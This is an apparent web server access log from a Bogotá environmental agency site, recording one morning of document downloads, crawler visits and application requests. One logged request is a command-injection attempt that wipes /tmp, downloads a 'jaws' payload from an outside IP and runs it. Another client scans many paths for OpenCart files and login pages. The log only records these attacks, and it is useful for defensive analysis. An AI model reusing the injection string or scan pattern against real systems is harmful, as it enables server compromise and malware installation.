216.244.66.195 - - [25/Oct/2023:04:48:58 -0500] "GET /BLA/resoluciones/AUTOS%202013/1568.pdf HTTP/1.1" 200 904917
186.155.17.142 - - [25/Oct/2023:04:49:01 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.155.17.142 - - [25/Oct/2023:04:49:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 63574
186.155.17.142 - - [25/Oct/2023:04:49:05 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.17.142 - - [25/Oct/2023:04:49:05 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.17.142 - - [25/Oct/2023:04:49:05 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.17.142 - - [25/Oct/2023:04:49:05 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.17.142 - - [25/Oct/2023:04:49:05 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.17.142 - - [25/Oct/2023:04:49:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1548
186.155.17.142 - - [25/Oct/2023:04:49:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 56451
186.155.17.142 - - [25/Oct/2023:04:49:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 56451
186.155.17.142 - - [25/Oct/2023:04:49:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1548
186.155.17.142 - - [25/Oct/2023:04:49:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.155.17.142 - - [25/Oct/2023:04:49:10 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 13449
186.155.17.142 - - [25/Oct/2023:04:49:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 56451
186.155.17.142 - - [25/Oct/2023:04:49:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 56451
186.155.17.142 - - [25/Oct/2023:04:49:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1548
186.155.17.142 - - [25/Oct/2023:04:49:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
52.167.144.20 - - [25/Oct/2023:04:49:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0894.pdf HTTP/1.1" 200 416347
216.244.66.195 - - [25/Oct/2023:04:49:29 -0500] "GET /BLA/resoluciones/AUTOS%202013/1735.pdf HTTP/1.1" 200 546628
52.167.144.20 - - [25/Oct/2023:04:49:29 -0500] "GET /Publicaciones/2023EE247345.pdf HTTP/1.1" 200 758883
201.245.192.253 - - [25/Oct/2023:04:49:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
216.244.66.195 - - [25/Oct/2023:04:50:07 -0500] "GET /BLA/resoluciones/AUTOS%202013/1772.pdf HTTP/1.1" 200 658145
168.119.52.80 - - [25/Oct/2023:04:50:14 -0500] "GET / HTTP/1.1" 200 319
168.119.52.80 - - [25/Oct/2023:04:50:16 -0500] "GET / HTTP/1.1" 200 4720
216.244.66.195 - - [25/Oct/2023:04:50:37 -0500] "GET /BLA/resoluciones/AUTOS%202013/1989.pdf HTTP/1.1" 200 385524
216.245.221.92 - - [25/Oct/2023:04:50:47 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [25/Oct/2023:04:51:07 -0500] "GET /BLA/resoluciones/AUTOS%202013/2108.pdf HTTP/1.1" 200 696481
216.244.66.195 - - [25/Oct/2023:04:51:46 -0500] "GET /BLA/resoluciones/AUTOS%202013/2316.pdf HTTP/1.1" 200 500010
216.244.66.195 - - [25/Oct/2023:04:52:17 -0500] "GET /BLA/resoluciones/AUTOS%202013/2320.pdf HTTP/1.1" 200 267115
172.22.2.4 - - [25/Oct/2023:04:52:17 -0500] "GET /BLA/boletinlegal/manage/account/login HTTP/1.1" 404 1018
66.249.66.21 - - [25/Oct/2023:04:52:30 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202023/429.pdf HTTP/1.1" 200 386936
66.249.66.20 - - [25/Oct/2023:04:52:41 -0500] "GET /BLA/resoluciones/AUTOS%202013/1765.pdf HTTP/1.1" 200 362800
216.244.66.195 - - [25/Oct/2023:04:52:46 -0500] "GET /BLA/resoluciones/AUTOS%202013/2492.pdf HTTP/1.1" 200 1086330
172.22.2.4 - - [25/Oct/2023:04:51:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [25/Oct/2023:04:53:15 -0500] "GET /BLA/resoluciones/AUTOS%202013/2618.pdf HTTP/1.1" 200 785391
216.244.66.195 - - [25/Oct/2023:04:53:44 -0500] "GET /BLA/resoluciones/AUTOS%202013/2934.pdf HTTP/1.1" 200 426248
172.22.2.4 - - [25/Oct/2023:04:52:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60331
216.244.66.195 - - [25/Oct/2023:04:54:11 -0500] "GET /BLA/resoluciones/AUTOS%202014/0715.pdf HTTP/1.1" 200 430083
66.249.66.19 - - [25/Oct/2023:04:54:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1734.pdf HTTP/1.1" 200 238398
201.245.192.253 - - [25/Oct/2023:04:54:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
114.119.134.64 - - [25/Oct/2023:04:54:35 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2017/&sort=size&order=desc HTTP/1.1" 200 13902
216.244.66.195 - - [25/Oct/2023:04:54:37 -0500] "GET /BLA/resoluciones/AUTOS%202014/1135.pdf HTTP/1.1" 200 381950
216.244.66.195 - - [25/Oct/2023:04:55:02 -0500] "GET /BLA/resoluciones/AUTOS%202014/1335.pdf HTTP/1.1" 200 439715
216.244.66.195 - - [25/Oct/2023:04:55:25 -0500] "GET /BLA/resoluciones/AUTOS%202014/2040.pdf HTTP/1.1" 200 342221
172.22.2.4 - - [25/Oct/2023:04:55:43 -0500] "GET /BLA/boletinlegal/login.rsp HTTP/1.1" 404 1018
216.245.221.92 - - [25/Oct/2023:04:55:47 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [25/Oct/2023:04:55:47 -0500] "GET /BLA/resoluciones/AUTOS%202014/2536.pdf HTTP/1.1" 200 481906
216.244.66.195 - - [25/Oct/2023:04:56:09 -0500] "GET /BLA/resoluciones/AUTOS%202019/1166.pdf HTTP/1.1" 200 294420
216.244.66.195 - - [25/Oct/2023:04:56:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0031.pdf HTTP/1.1" 200 335223
216.244.66.195 - - [25/Oct/2023:04:56:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0198.pdf HTTP/1.1" 200 69405
172.22.2.4 - - [25/Oct/2023:04:57:03 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [25/Oct/2023:04:57:04 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%202%20del%201%20de%20julio%20de%202015.pdf HTTP/1.1" 200 752890
216.244.66.195 - - [25/Oct/2023:04:57:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0202.pdf HTTP/1.1" 200 270360
216.244.66.195 - - [25/Oct/2023:04:57:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0361.pdf HTTP/1.1" 200 65715
216.244.66.195 - - [25/Oct/2023:04:57:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0402.pdf HTTP/1.1" 200 264164
216.244.66.195 - - [25/Oct/2023:04:57:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0431.pdf HTTP/1.1" 200 69833
216.244.66.195 - - [25/Oct/2023:04:58:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0605.pdf HTTP/1.1" 200 71985
216.244.66.195 - - [25/Oct/2023:04:58:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0606.pdf HTTP/1.1" 200 69029
186.155.128.248 - - [25/Oct/2023:04:58:33 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
186.155.128.248 - - [25/Oct/2023:04:58:34 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
186.155.128.248 - - [25/Oct/2023:04:58:34 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
186.155.128.248 - - [25/Oct/2023:04:58:34 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
186.155.128.248 - - [25/Oct/2023:04:58:34 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
186.155.128.248 - - [25/Oct/2023:04:58:34 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
216.244.66.195 - - [25/Oct/2023:04:58:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0686.pdf HTTP/1.1" 200 71597
172.22.2.4 - - [25/Oct/2023:04:58:47 -0500] "GET /BLA/boletinlegal/catalog/view/javascript/common.js HTTP/1.1" 404 1037
216.244.66.195 - - [25/Oct/2023:04:58:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0691.pdf HTTP/1.1" 200 62215
172.22.2.4 - - [25/Oct/2023:04:58:49 -0500] "GET /BLA/boletinlegal/opencart/catalog/view/javascript/common.js HTTP/1.1" 404 1037
172.22.2.4 - - [25/Oct/2023:04:58:50 -0500] "GET /BLA/boletinlegal/opc/catalog/view/javascript/common.js HTTP/1.1" 404 1037
172.22.2.4 - - [25/Oct/2023:04:58:51 -0500] "GET /BLA/boletinlegal/opc21/catalog/view/javascript/common.js HTTP/1.1" 404 1037
186.155.128.248 - - [25/Oct/2023:04:58:53 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
172.22.2.4 - - [25/Oct/2023:04:58:53 -0500] "GET /BLA/boletinlegal/shop/catalog/view/javascript/common.js HTTP/1.1" 404 1037
172.22.2.4 - - [25/Oct/2023:04:58:54 -0500] "GET /BLA/boletinlegal/toko/catalog/view/javascript/common.js HTTP/1.1" 404 1037
172.22.2.4 - - [25/Oct/2023:04:58:56 -0500] "GET /BLA/boletinlegal/store/catalog/view/javascript/common.js HTTP/1.1" 404 1037
172.22.2.4 - - [25/Oct/2023:04:58:57 -0500] "GET /BLA/boletinlegal/web/catalog/view/javascript/common.js HTTP/1.1" 404 1037
216.244.66.195 - - [25/Oct/2023:04:58:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0725.pdf HTTP/1.1" 200 93693
172.22.2.4 - - [25/Oct/2023:04:58:58 -0500] "GET /BLA/boletinlegal/webshop/catalog/view/javascript/common.js HTTP/1.1" 404 1037
186.155.128.248 - - [25/Oct/2023:04:58:58 -0500] "POST /appsia/controlador HTTP/1.1" 200 7785
172.22.2.4 - - [25/Oct/2023:04:57:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2023:04:59:00 -0500] "GET /BLA/boletinlegal/marketplace/catalog/view/javascript/common.js HTTP/1.1" 404 1037
172.22.2.4 - - [25/Oct/2023:04:59:01 -0500] "GET /BLA/boletinlegal/market/catalog/view/javascript/common.js HTTP/1.1" 404 1037
186.155.128.248 - - [25/Oct/2023:04:59:01 -0500] "POST /appsia/controlador HTTP/1.1" 200 6650
172.22.2.4 - - [25/Oct/2023:04:59:03 -0500] "GET /BLA/boletinlegal/old/catalog/view/javascript/common.js HTTP/1.1" 404 1037
172.22.2.4 - - [25/Oct/2023:04:59:04 -0500] "GET /BLA/boletinlegal/demo/catalog/view/javascript/common.js HTTP/1.1" 404 1037
186.155.128.248 - - [25/Oct/2023:04:59:04 -0500] "POST /appsia/controlador HTTP/1.1" 200 10910
172.22.2.4 - - [25/Oct/2023:04:59:05 -0500] "GET /BLA/boletinlegal/ecommerce/catalog/view/javascript/common.js HTTP/1.1" 404 1037
172.22.2.4 - - [25/Oct/2023:04:59:07 -0500] "GET /BLA/boletinlegal/cart/catalog/view/javascript/common.js HTTP/1.1" 404 1037
216.244.66.195 - - [25/Oct/2023:04:59:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0786.pdf HTTP/1.1" 200 66125
172.22.2.4 - - [25/Oct/2023:04:59:08 -0500] "GET /BLA/boletinlegal/e-commerce/catalog/view/javascript/common.js HTTP/1.1" 404 1037
172.22.2.4 - - [25/Oct/2023:04:59:09 -0500] "GET /BLA/boletinlegal/new/catalog/view/javascript/common.js HTTP/1.1" 404 1037
172.22.2.4 - - [25/Oct/2023:04:59:11 -0500] "GET /BLA/boletinlegal/bak/catalog/view/javascript/common.js HTTP/1.1" 404 1037
172.22.2.4 - - [25/Oct/2023:04:59:12 -0500] "GET /BLA/boletinlegal/backup/catalog/view/javascript/common.js HTTP/1.1" 404 1037
216.244.66.195 - - [25/Oct/2023:04:59:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0981.pdf HTTP/1.1" 200 437384
216.244.66.195 - - [25/Oct/2023:04:59:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1356.pdf HTTP/1.1" 200 67545
216.244.66.195 - - [25/Oct/2023:04:59:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1442.pdf HTTP/1.1" 200 73915
201.245.192.253 - - [25/Oct/2023:04:59:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
216.244.66.195 - - [25/Oct/2023:04:59:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1487.pdf HTTP/1.1" 200 68655
216.244.66.195 - - [25/Oct/2023:04:59:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1594.pdf HTTP/1.1" 200 68841
216.244.66.195 - - [25/Oct/2023:04:59:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1599.pdf HTTP/1.1" 200 78099
216.244.66.195 - - [25/Oct/2023:04:59:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1641.pdf HTTP/1.1" 200 75587
172.22.2.4 - - [25/Oct/2023:04:58:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60331
216.244.66.195 - - [25/Oct/2023:04:59:50 -0500] "GET /BLA/resoluciones/AUTOS%202017/3808.pdf HTTP/1.1" 200 863825
52.167.144.180 - - [25/Oct/2023:04:59:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/1510.pdf HTTP/1.1" 200 792504
172.22.2.4 - - [25/Oct/2023:04:59:53 -0500] "GET /BLA/boletinlegal/login.rsp HTTP/1.1" 404 1018
216.244.66.195 - - [25/Oct/2023:04:59:55 -0500] "GET /BLA/resoluciones/AUTOS%202017/3847.pdf HTTP/1.1" 200 280424
216.244.66.195 - - [25/Oct/2023:04:59:58 -0500] "GET /BLA/resoluciones/AUTOS%202017/5220.pdf HTTP/1.1" 200 332085
216.244.66.195 - - [25/Oct/2023:05:00:02 -0500] "GET /BLA/resoluciones/AUTOS%202017/5242.pdf HTTP/1.1" 200 405790
216.244.66.195 - - [25/Oct/2023:05:00:06 -0500] "GET /galeria/galeria/fotos/Encuentro-de-Movimientos10G.jpg HTTP/1.1" 200 139410
216.244.66.195 - - [25/Oct/2023:05:00:08 -0500] "GET /galeria/galeria/fotos/Grande6Parque-nacional.jpg HTTP/1.1" 200 347131
216.244.66.195 - - [25/Oct/2023:05:00:14 -0500] "GET /BLA/resoluciones/AUTOS%202008/0499.pdf HTTP/1.1" 200 76769
216.244.66.195 - - [25/Oct/2023:05:00:18 -0500] "GET /BLA/resoluciones/AUTOS%202008/0525.pdf HTTP/1.1" 200 97687
216.244.66.195 - - [25/Oct/2023:05:00:21 -0500] "GET /BLA/resoluciones/AUTOS%202008/1531.pdf HTTP/1.1" 200 106850
216.244.66.195 - - [25/Oct/2023:05:00:25 -0500] "GET /BLA/resoluciones/AUTOS%202008/1593.pdf HTTP/1.1" 200 96938
216.244.66.195 - - [25/Oct/2023:05:00:27 -0500] "GET /BLA/resoluciones/AUTOS%202008/1631.pdf HTTP/1.1" 200 67900
216.244.66.195 - - [25/Oct/2023:05:00:30 -0500] "GET /BLA/resoluciones/AUTOS%202013/0706.pdf HTTP/1.1" 200 2579979
216.244.66.195 - - [25/Oct/2023:05:00:36 -0500] "GET /BLA/resoluciones/AUTOS%202013/1990.pdf HTTP/1.1" 200 3243873
216.244.66.195 - - [25/Oct/2023:05:00:46 -0500] "GET /BLA/resoluciones/AUTOS%202013/2582.pdf HTTP/1.1" 200 841760
216.245.221.92 - - [25/Oct/2023:05:00:47 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [25/Oct/2023:05:00:54 -0500] "GET /BLA/resoluciones/AUTOS%202014/0189.pdf HTTP/1.1" 200 466576
216.244.66.195 - - [25/Oct/2023:05:01:01 -0500] "GET /BLA/resoluciones/AUTOS%202014/2503.pdf HTTP/1.1" 200 570380
216.244.66.195 - - [25/Oct/2023:05:01:07 -0500] "GET /BLA/resoluciones/AUTOS%202015/0464.pdf HTTP/1.1" 200 449947
216.244.66.195 - - [25/Oct/2023:05:01:11 -0500] "GET /BLA/resoluciones/AUTOS%202015/3384.pdf HTTP/1.1" 200 629034
66.249.66.20 - - [25/Oct/2023:05:01:16 -0500] "GET /BLA/resoluciones/AUTOS%202010/4610.pdf HTTP/1.1" 200 254608
216.244.66.195 - - [25/Oct/2023:05:01:17 -0500] "GET /BLA/resoluciones/AUTOS%202015/3390.pdf HTTP/1.1" 200 642287
173.252.87.4 - - [25/Oct/2023:05:01:19 -0500] "GET /images/Red%20de%20Monitoreo%20de%20Calidad%20del%20Aire.jpg HTTP/1.1" 200 51986
216.244.66.195 - - [25/Oct/2023:05:01:22 -0500] "GET /BLA/resoluciones/AUTOS%202015/3662.pdf HTTP/1.1" 200 1144856
216.244.66.246 - - [25/Oct/2023:05:02:09 -0500] "GET /robots.txt HTTP/1.1" 404 1035
40.77.167.26 - - [25/Oct/2023:05:02:49 -0500] "GET /bla/resoluciones/resoluciones%202012/1467.pdf HTTP/1.1" 200 1051256
172.22.2.4 - - [25/Oct/2023:05:01:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
69.63.184.117 - - [25/Oct/2023:05:03:23 -0500] "GET /images/pl\xc3\xa1sticos%20foto%201..jpg HTTP/1.1" 404 1034
172.22.2.4 - - [25/Oct/2023:05:03:28 -0500] "GET /BLA/boletinlegal/Login.html HTTP/1.1" 404 1018
69.63.184.117 - - [25/Oct/2023:05:04:05 -0500] "GET /participa-en-la-convocatoria-para-el-aseguramiento-metrologico-de-la-red-de-monitoreo-de-calidad-del-aire-de-bogota.html HTTP/1.1" 200 848
66.249.66.20 - - [25/Oct/2023:05:04:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5708.pdf HTTP/1.1" 200 448710
201.245.192.253 - - [25/Oct/2023:05:04:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
172.22.2.4 - - [25/Oct/2023:05:03:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.21 - - [25/Oct/2023:05:05:31 -0500] "GET /silvicultura/6.pdf HTTP/1.1" 200 215404
172.22.2.4 - - [25/Oct/2023:05:04:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54006
216.245.221.92 - - [25/Oct/2023:05:05:47 -0500] "HEAD / HTTP/1.1" 200 -
181.59.148.54 - - [25/Oct/2023:05:05:59 -0500] "GET /con-plantacion-de-arboles-sigue-la-consolidacion-de-los-conectores-ecosistemicos-en-bogota.html HTTP/1.1" 200 896
66.249.66.19 - - [25/Oct/2023:05:06:03 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/restauracion/sitio/55_artic/xtras/10.pdf HTTP/1.1" 404 1018
66.249.66.20 - - [25/Oct/2023:05:06:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6981.pdf HTTP/1.1" 200 405010
172.22.2.4 - - [25/Oct/2023:05:06:32 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%201%20del%205%20de%20Abril%20de%202011.pdf HTTP/1.1" 200 971292
172.22.2.4 - - [25/Oct/2023:05:07:08 -0500] "GET /BLA/boletinlegal/Login.html HTTP/1.1" 404 1018
201.245.192.253 - - [25/Oct/2023:05:09:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
172.22.2.4 - - [25/Oct/2023:05:10:25 -0500] "GET /BLA/boletinlegal/login.html HTTP/1.1" 404 1018
172.22.2.4 - - [25/Oct/2023:05:08:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [25/Oct/2023:05:10:47 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.246 - - [25/Oct/2023:05:11:25 -0500] "GET /portaldeninos/aulas-ambientales-2/parque-ecologico-distrital-de-montana-entrenubes/ HTTP/1.1" 200 90406
172.22.2.4 - - [25/Oct/2023:05:09:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60331
52.167.144.161 - - [25/Oct/2023:05:11:36 -0500] "GET /portaldeninos/gestion-del-riesgo-incendios-forestales/ HTTP/1.1" 200 86825
66.249.66.20 - - [25/Oct/2023:05:13:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3812.pdf HTTP/1.1" 200 126971
172.22.2.4 - - [25/Oct/2023:05:14:10 -0500] "GET /BLA/boletinlegal/login.html HTTP/1.1" 404 1018
201.245.192.253 - - [25/Oct/2023:05:14:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
216.245.221.92 - - [25/Oct/2023:05:15:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2023:05:14:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [25/Oct/2023:05:17:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40510
201.245.192.253 - - [25/Oct/2023:05:17:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39166
172.22.2.4 - - [25/Oct/2023:05:15:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60331
172.22.2.4 - - [25/Oct/2023:05:17:34 -0500] "GET /BLA/boletinlegal/npclient.html HTTP/1.1" 404 1018
66.249.66.19 - - [25/Oct/2023:05:17:48 -0500] "GET /resoluciones/RESOLUCIONES%202010/1390.pdf HTTP/1.1" 404 1018
201.245.192.253 - - [25/Oct/2023:05:19:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
66.249.66.21 - - [25/Oct/2023:05:20:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%202101%20AL%202200/RESOLUCION%202143%20DE%202007.pdf HTTP/1.1" 200 926874
201.245.192.253 - - [25/Oct/2023:05:20:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40510
201.245.192.253 - - [25/Oct/2023:05:20:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39166
216.244.66.195 - - [25/Oct/2023:05:20:36 -0500] "GET /robots.txt HTTP/1.1" 404 1018
216.245.221.92 - - [25/Oct/2023:05:20:47 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2023:05:21:19 -0500] "GET /BLA/boletinlegal/npclient.html HTTP/1.1" 404 1018
66.249.66.20 - - [25/Oct/2023:05:21:29 -0500] "GET /Publicaciones/2023EE218970.pdf HTTP/1.1" 404 228
172.22.2.4 - - [25/Oct/2023:05:20:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2023:05:22:38 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [25/Oct/2023:05:22:38 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20C-595-2010.doc HTTP/1.1" 200 39424
172.22.2.4 - - [25/Oct/2023:05:21:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60331
40.77.167.41 - - [25/Oct/2023:05:23:27 -0500] "GET /Publicaciones/2023EE245810.pdf HTTP/1.1" 200 231840
201.245.192.253 - - [25/Oct/2023:05:24:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
172.22.2.4 - - [25/Oct/2023:05:24:48 -0500] "GET /BLA/boletinlegal/NPClient.html HTTP/1.1" 404 1018
52.167.144.212 - - [25/Oct/2023:05:25:14 -0500] "GET /Publicaciones/2023EE241956.pdf HTTP/1.1" 200 231813
216.245.221.92 - - [25/Oct/2023:05:25:47 -0500] "HEAD / HTTP/1.1" 200 -
173.252.87.118 - - [25/Oct/2023:05:26:09 -0500] "GET /ingresar-a-los-cuerpos-de-agua-de-los-humedales-esta-prohibido-no-arriesgues-tu-vida-por-unos-me-gusta.html HTTP/1.1" 200 894
102.36.222.252 - - [25/Oct/2023:05:26:20 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+167.71.210.63/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
201.245.192.253 - - [25/Oct/2023:05:27:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40510
201.245.192.253 - - [25/Oct/2023:05:27:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39166
52.167.144.212 - - [25/Oct/2023:05:27:35 -0500] "GET /Publicaciones/2023EE247955.pdf HTTP/1.1" 200 231871
172.22.2.4 - - [25/Oct/2023:05:26:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2023:05:28:30 -0500] "GET /BLA/boletinlegal/NPClient.html HTTP/1.1" 404 1018
172.22.2.4 - - [25/Oct/2023:05:27:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57957
40.77.167.13 - - [25/Oct/2023:05:29:20 -0500] "GET /galeria/galeria/fotos/Entrenube3G.jpg HTTP/1.1" 200 138221
201.245.192.253 - - [25/Oct/2023:05:29:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
172.22.2.4 - - [25/Oct/2023:05:29:32 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2003%20del%2024%20de%20Febrero%20de%202017.pdf HTTP/1.1" 200 6911517
201.245.192.253 - - [25/Oct/2023:05:30:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40510
201.245.192.253 - - [25/Oct/2023:05:30:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39166
216.245.221.92 - - [25/Oct/2023:05:30:47 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.21 - - [25/Oct/2023:05:31:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1941.pdf HTTP/1.1" 200 468531
172.22.2.4 - - [25/Oct/2023:05:32:03 -0500] "GET /BLA/boletinlegal/apps HTTP/1.1" 404 1018
173.252.107.119 - - [25/Oct/2023:05:32:57 -0500] "GET /distrito-planto-mas-de-300-arboles-en-corredor-vial-de-la-aurora-en-usme-para-celebrar-el-dia-mundial-del-arbol.html HTTP/1.1" 200 1023
201.245.192.253 - - [25/Oct/2023:05:34:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40804
66.249.66.21 - - [25/Oct/2023:05:34:39 -0500] "GET /BLA/resoluciones/AUTOS%202011/7732.pdf HTTP/1.1" 200 246019
172.22.2.4 - - [25/Oct/2023:05:35:35 -0500] "GET /BLA/boletinlegal/apps HTTP/1.1" 404 1018
216.245.221.92 - - [25/Oct/2023:05:35:55 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.20 - - [25/Oct/2023:05:36:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6541.pdf HTTP/1.1" 200 435741
20.125.53.50 - - [25/Oct/2023:05:36:32 -0500] "GET /galeria/galeria/fotos/diaSC7Peq.jpg HTTP/1.1" 200 18357
201.245.192.253 - - [25/Oct/2023:05:37:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40510
201.245.192.253 - - [25/Oct/2023:05:37:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39166
69.63.184.7 - - [25/Oct/2023:05:37:11 -0500] "GET /images/cuerpos%20de%20agua%20en%20humedales-19-10.jpg HTTP/1.1" 200 73528
40.77.167.52 - - [25/Oct/2023:05:37:12 -0500] "GET /Publicaciones/2023EE247962.pdf HTTP/1.1" 200 231956
172.22.2.4 - - [25/Oct/2023:05:39:09 -0500] "GET /BLA/boletinlegal/index.html HTTP/1.1" 404 1018
